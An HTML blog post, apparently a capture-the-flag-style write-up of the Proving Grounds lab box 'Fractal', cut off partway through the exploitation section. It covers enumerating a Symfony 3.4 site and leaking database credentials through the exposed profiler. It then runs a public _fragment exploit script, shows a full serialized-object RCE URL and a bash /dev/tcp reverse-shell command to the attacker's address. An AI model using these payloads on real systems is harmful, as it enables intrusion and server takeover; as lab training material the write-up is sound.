<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover">
  <!-- Setup Open Graph image -->



  <!-- Begin Jekyll SEO tag v2.8.0 -->
  <meta name="generator" content="Jekyll v4.3.3" />
  <meta property="og:title" content="Proving Grounds - Fractal" />
  <meta property="og:locale" content="en" />
  <meta name="description"
    content="Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a Symfony CMS through HTTP enumeration." />
  <meta property="og:description"
    content="Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a Symfony CMS through HTTP enumeration." />
  <link rel="canonical" href="http://localhost:4000/posts/Proving-Grounds-Fractal/" />
  <meta property="og:url" content="http://localhost:4000/posts/Proving-Grounds-Fractal/" />
  <meta property="og:image" content="http://localhost:4000/../assets/img/oscp/oscp.png" />
  <meta property="og:type" content="article" />
  <meta property="article:published_time" content="2024-07-10T00:00:00-03:00" />
  <meta name="twitter:card" content="summary_large_image" />
  <meta property="twitter:image" content="http://localhost:4000/../assets/img/oscp/oscp.png" />
  <meta property="twitter:title" content="Proving Grounds - Fractal" />
  <script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2024-07-10T00:00:00-03:00","datePublished":"2024-07-10T00:00:00-03:00","description":"Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a Symfony CMS through HTTP enumeration.","headline":"Proving Grounds - Fractal","image":"http://localhost:4000/../assets/img/oscp/oscp.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/Proving-Grounds-Fractal/"},"url":"http://localhost:4000/posts/Proving-Grounds-Fractal/"}</script>
  <!-- End Jekyll SEO tag -->


  <title>Proving Grounds - Fractal |
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



  <link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png" />


  <link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" />
  <meta name="apple-mobile-web-app-title" content="" />
  <meta name="application-name" content="" />
  <meta name="msapplication-TileColor" content="#da532c" />
  <meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml" />
  <meta name="theme-color" content="#ffffff" />


  <!-- Resource Hints -->



  <link rel="preconnect" href="https://fonts.googleapis.com">

  <link rel="dns-prefetch" href="https://fonts.googleapis.com">



  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

  <link rel="dns-prefetch" href="https://fonts.gstatic.com">



  <link rel="preconnect" href="https://cdn.jsdelivr.net">

  <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">




  <!-- Bootstrap -->

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">


  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.5.2/css/all.min.css">

  <!-- 3rd-party Dependencies -->


  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.27.20/dist/tocbot.min.css">



  <link rel="stylesheet"
    href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">



  <!-- Image Popup -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">


  <!-- JavaScript -->



  <!-- A placeholder to allow defining custom metadata -->

</head>


<body>
  <!-- The Side Bar -->

  <aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
    <header class="profile-wrapper">
      <a href="/" id="avatar" class="rounded-circle"><img src="/commons/avatar.jpg" width="112" height="112"
          alt="avatar" onerror="this.style.display='none'"></a>

      <h1 class="site-title">
        <a href="/">H3NDR1CH</a>
      </h1>
      <p class="site-subtitle fst-italic mb-0">Writeup's - Tools - Pentest Guide</p>
    </header>
    <!-- .profile-wrapper -->

    <nav class="flex-column flex-grow-1 w-100 ps-0">
      <ul class="nav">
        <!-- home -->
        <li class="nav-item">
          <a href="/" class="nav-link">
            <i class="fa-fw fas fa-home"></i>
            <span>HOME</span>
          </a>
        </li>
        <!-- the real tabs -->

        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>


            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->

        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>


            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->

        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>


            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->

        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>


            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->

      </ul>
    </nav>

    <div class="sidebar-bottom d-flex flex-wrap align-items-center w-100">



      <a href="https://github.com/arthurhendrich" aria-label="GitHub" target="_blank" rel="noopener noreferrer">
        <i class="fab fa-github"></i>
      </a>
      <a href="https://www.linkedin.com/in/arthurhendrich" aria-label="LinkedIn" target="_blank"
        rel="noopener noreferrer">
        <i class="fab fa-linkedin"></i>
      </a>
    </div>
    <!-- .sidebar-bottom -->
  </aside>
  <!-- #sidebar -->

  <div id="main-wrapper" class="d-flex justify-content-center">
    <div class="container d-flex flex-column px-xxl-5">
      <!-- The Top Bar -->

      <header id="topbar-wrapper" aria-label="Top Bar">
        <div id="topbar" class="d-flex align-items-center justify-content-between px-lg-3 h-100">
          <nav id="breadcrumb" aria-label="Breadcrumb">





            <span>
              <a href="/">Home</a>
            </span>







            <span>Proving Grounds - Fractal</span>





          </nav>
          <!-- endof #breadcrumb -->

          <button type="button" id="sidebar-trigger" class="btn btn-link">
            <i class="fas fa-bars fa-fw"></i>
          </button>

          <div id="topbar-title">
            Post
          </div>

          <button type="button" id="search-trigger" class="btn btn-link">
            <i class="fas fa-search fa-fw"></i>
          </button>

          <search id="search" class="align-items-center ms-3 ms-lg-0">
            <i class="fas fa-search fa-fw"></i>
            <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off"
              placeholder="Search...">
          </search>
          <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
        </div>
      </header>


      <div class="row flex-grow-1">
        <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">

          <!-- Refactor the HTML structure -->



          <!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



          <!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



          <!-- Change the icon of checkbox -->



          <!-- Handle images -->



































































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->


































          <!-- take out classes -->











          <!-- lazy-load images -->



          <!-- make sure the `<img>` is wrapped by `<a>` -->



          <!-- create the image wrapper -->







          <!-- combine -->






          <!-- Add header for code snippets -->



          <!-- Create heading anchors -->


















































































































          <!-- return -->




          <article class="px-1">
            <header>
              <h1 data-toc-skip>Proving Grounds - Fractal</h1>


              <div class="post-meta text-muted">
                <!-- published date -->
                <span>
                  Posted
                  <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




                  <time data-ts="1720580400" data-df="ll" data-bs-toggle="tooltip" data-bs-placement="bottom">
                    Jul 10, 2024
                  </time>

                </span>

                <!-- lastmod date -->









                <div class="mt-3 mb-3">
                  <a href="/../assets/img/oscp/oscp.png" class="popup img-link preview-img shimmer"><img
                      src="/../assets/img/oscp/oscp.png" alt="Preview Image" width="1200" height="630"
                      loading="lazy"></a>
                </div>


                <div class="d-flex justify-content-between">
                  <!-- author(s) -->
                  <span>


                    By

                    <em>

                      <a href="">H3NDR1CH</a>

                    </em>
                  </span>

                  <div>
                    <!-- pageviews -->


                    <!-- read time -->
                    <!-- Calculate the post's reading time, and display the word count in tooltip -->



                    <!-- words per minute -->










                    <!-- return element -->
                    <span class="readtime" data-bs-toggle="tooltip" data-bs-placement="bottom" title="585 words">
                      <em>3 min</em> read</span>

                  </div>
                </div>
              </div>
            </header>

            <div class="content">
              <p>Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a
                Symfony CMS through HTTP enumeration.</p>

              <p>The Symfony profiler was explored, leading to finding sensitive files and obtaining database
                credentials.</p>

              <p>Using these credentials, a Symfony exploit script was executed to achieve Remote Code Execution (RCE)
                and gain a reverse shell.</p>

              <p>Privilege escalation involved creating a new user via MySQL, allowing SSH access with elevated
                privileges, eventually leading to root access.</p>

              <h1 id="diagram">Diagram</h1>

              <pre><code class="language-mermaid">graph TD
    A[Host Enumeration] --&gt;|Nmap Scan| B[HTTP Enumeration]
    B --&gt;|Identify Symfony| C[Explore Symfony Profiler]
    C --&gt;|Find Sensitive Files| D[Exploit Symfony]
    D --&gt;|Obtain Database Credentials| E[Use Symfony Exploit Script]
    E --&gt;|RCE| F[Reverse Shell]
    F --&gt;|Privilege Escalation| G[Create user via MySQL]
    G --&gt;|Create User| H[SSH Access]
    H --&gt;|User Benoit| I[Root Access]
</code></pre>

              <h2 id="information-gathering"><span class="me-2">Information Gathering</span><a
                  href="#information-gathering" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

              <h3 id="port-scan"><span class="me-2">Port Scan</span><a href="#port-scan" class="anchor text-muted"><i
                    class="fas fa-hashtag"></i></a></h3>
              <hr />

              <ul>
                <li>
                  <p><code
                      class="language-plaintext highlighter-rouge">nmap -sS -Pn -n --open -p- -T4 192.168.192.233</code>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">nmap -sVC -p 21,22,80 192.168.192.233</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%201.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%201.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <h2 id="enumeration"><span class="me-2">Enumeration</span><a href="#enumeration"
                  class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

              <h3 id="http-80"><span class="me-2">HTTP 80</span><a href="#http-80" class="anchor text-muted"><i
                    class="fas fa-hashtag"></i></a></h3>

              <hr />

              <ul>
                <li>
                  <p><a href="http://192.168.230.233/">http://192.168.192.233/</a></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%202.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%202.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><a href="http://192.168.230.233/robots.txt">http://192.168.192.233/robots.txt</a> → CMS symfony 3.4
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%203.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%203.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>I Forced an error to appear</p>

              <ul>
                <li>
                  <p><a href="http://192.168.230.233/app_dev.php/*">http://192.168.192.233/app_dev.php/randomfile</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%204.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%204.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li><a
                    href="http://192.168.230.233/app_dev.php/_profiler/empty/search/results?limit=10">http://192.168.192.233/app_dev.php/_profiler/empty/search/results?limit=10</a>
                </li>
                <li>
                  <p><a
                      href="https://github.com/symfony/symfony/issues/28002">https://github.com/symfony/symfony/issues/28002</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%205.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%205.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p>Profile Token</p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%206.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%206.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Accessed as if it were an admin panel.</p>

              <ul>
                <li>
                  <p><a
                      href="http://192.168.192.233/app_dev.php/_profiler/c7b124">http://192.168.192.233/app_dev.php/_profiler/c7b124</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%207.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%207.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Checking the branch on GitHub, it is possible to view documentation about upgrading Symfony 3.x, so we
                might find sensitive files.</p>

              <ul>
                <li>
                  <p><a
                      href="https://github.dev/symfony/symfony/tree/3.4">https://github.dev/symfony/symfony/tree/3.4</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%208.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%208.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Then I decided to investigate the _profiler to find directories since I tried passing it as a URL and
                got nothing. I filtered by all these statuses to avoid issues.</p>

              <ul>
                <li><code
                    class="language-plaintext highlighter-rouge">ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.192.233/app_dev.php/_profiler/FUZZ -fs 47400,47401,47402,47403,47404,47405,47406,47407,47408,47409,47410,47411,47412,47413,47414,47415,47416,47417,47418,47419,47420,47421,47422,47423,47424,47425,47426,47427,47428,47429,47430,47431,47432,47433,47434,47435,47436,47437,47438,47439,47440,47441,47442,47443,47444,47445,47446,47447,47448,47449,47450,47451,47452,47453,47454,47455,47456,47457,47458,47459,47460,47461,47462,47463,47464,47465,47466,47467,47468,47469,47470,47471,47472,47473,47474,47475,47476,47477,47478,47479,47480,47481,47482,47483,47484,47485,47486,47487,47488,47489,47490,47491,47492,47493,47494,47495,47496,47497,47498,47499</code>
                </li>
              </ul>

              <p>Found 2 directories “latest” and “open”</p>

              <p><a href="/../assets/img/oscp/Fractal/Untitled%209.png" class="popup img-link  shimmer"><img
                    src="/../assets/img/oscp/Fractal/Untitled%209.png" alt="Untitled" loading="lazy"></a></p>

              <p><a href="/../assets/img/oscp/Fractal/Untitled%2010.png" class="popup img-link  shimmer"><img
                    src="/../assets/img/oscp/Fractal/Untitled%2010.png" alt="Untitled" loading="lazy"></a></p>

              <p>Investigating the latest had nothing…</p>

              <p>Says the file is not readable. So, I will try to read the file found “.yml” on GitHub.</p>

              <ul>
                <li>
                  <p><a
                      href="http://192.168.192.233/app_dev.php/_profiler/open">http://192.168.192.233/app_dev.php/_profiler/open</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2011.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2011.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code
                      class="language-plaintext highlighter-rouge">ffuf -u http://192.168.192.233/app_dev.php/_profiler/open?FUZZ=app/config/parameters.yml -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 100 -fs 5522</code>
                    → Found “file”</p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2012.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2012.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Now accessing the URL, I’ve found Database credentials.</p>

              <ul>
                <li>
                  <p><a
                      href="http://192.168.192.233/app_dev.php/_profiler/open?file=app/config/parameters.yml">http://192.168.192.233/app_dev.php/_profiler/open?file=app/config/parameters.yml</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2013.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2013.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <h2 id="exploitation"><span class="me-2">Exploitation</span><a href="#exploitation"
                  class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

              <p>Searching a lot, I found the following article <a
                  href="https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5">https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5</a>
              </p>

              <ul>
                <li><a
                    href="https://raw.githubusercontent.com/ambionics/symfony-exploits/main/secret_fragment_exploit.py">https://raw.githubusercontent.com/ambionics/symfony-exploits/main/secret_fragment_exploit.py</a>
                </li>
              </ul>

              <p>Inside it, there is an exploit from a fragment. I tried to enumerate the secret but found nothing.</p>

              <ul>
                <li>
                  <p><code
                      class="language-plaintext highlighter-rouge">python3 secret_fragment_exploit.py http://192.168.192.233/_fragment</code>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2014.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2014.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Then I decided to use the secret found in the database.</p>

              <ul>
                <li>
                  <p><code
                      class="language-plaintext highlighter-rouge">python3 secret_fragment_exploit.py 'http://192.168.192.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.192.233/_fragment' --function system --parameters "id"</code>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2015.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2015.png" alt="Untitled" loading="lazy"></a></p>
                </li>
              </ul>

              <p>Now accessing the generated URL. I was able to execute commands.</p>

              <ul>
                <li>
                  <p><a
                      href="http://192.168.192.233/_fragment?_path=_controller%3DSymfony%255CComponent%255CYaml%255CInline%253A%253Aparse%26value%3D%2521php%252Fobject%2BO%253A32%253A%2522Monolog%255CHandler%255CSyslogUdpHandler%2522%253A1%253A%257Bs%253A9%253A%2522%2500%252A%2500socket%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BN%253Bs%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522-1%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257Ds%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522id%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257D%257D%26exceptionOnInvalidType%3D0%26objectSupport%3D1%26objectForMap%3D0%26references%3D%26flags%3D516&amp;_hash=11%2FxvG%2BUpm6nlv7maKqSHFIXdN0BjTshxq568sphXaU%3D">http://192.168.192.233/_fragment?_path=_controller%3DSymfony%255CComponent%255CYaml%255CInline%253A%253Aparse%26value%3D%2521php%252Fobject%2BO%253A32%253A%2522Monolog%255CHandler%255CSyslogUdpHandler%2522%253A1%253A%257Bs%253A9%253A%2522%2500%252A%2500socket%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BO%253A29%253A%2522Monolog%255CHandler%255CBufferHandler%2522%253A7%253A%257Bs%253A10%253A%2522%2500%252A%2500handler%2522%253BN%253Bs%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522-1%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257Ds%253A13%253A%2522%2500%252A%2500bufferSize%2522%253Bi%253A-1%253Bs%253A9%253A%2522%2500%252A%2500buffer%2522%253Ba%253A1%253A%257Bi%253A0%253Ba%253A2%253A%257Bi%253A0%253Bs%253A2%253A%2522id%2522%253Bs%253A5%253A%2522level%2522%253BN%253B%257D%257Ds%253A8%253A%2522%2500%252A%2500level%2522%253BN%253Bs%253A14%253A%2522%2500%252A%2500initialized%2522%253Bb%253A1%253Bs%253A14%253A%2522%2500%252A%2500bufferLimit%2522%253Bi%253A-1%253Bs%253A13%253A%2522%2500%252A%2500processors%2522%253Ba%253A2%253A%257Bi%253A0%253Bs%253A7%253A%2522current%2522%253Bi%253A1%253Bs%253A6%253A%2522system%2522%253B%257D%257D%257D%26exceptionOnInvalidType%3D0%26objectSupport%3D1%26objectForMap%3D0%26references%3D%26flags%3D516&amp;_hash=11%2FxvG%2BUpm6nlv7maKqSHFIXdN0BjTshxq568sphXaU%3D</a>
                  </p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2016.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2016.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li>
                  <p><code class="language-plaintext highlighter-rouge">python3 secret_fragment_exploit.py '[http://192.168.192.233/_fragment](http://192.168.192.233/_fragment)' \
--method 2 \
--secret '48a8538e6260789558f0dfe29861c05b' \
--algo 'sha256' \
--internal-url '[http://192.168.192.233/_fragment](http://192.168.192.233/_fragment)' \
--function system \
--parameters "bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.45.227/80 0&gt;&amp;1'"</code></p>

                  <p><a href="/../assets/img/oscp/Fractal/Untitled%2017.png" class="popup img-link  shimmer"><img
                        src="/../assets/img/oscp/Fractal/Untitled%2017.png" alt="Untitled" loading="lazy"></a></p>
                </li>
                <li><a
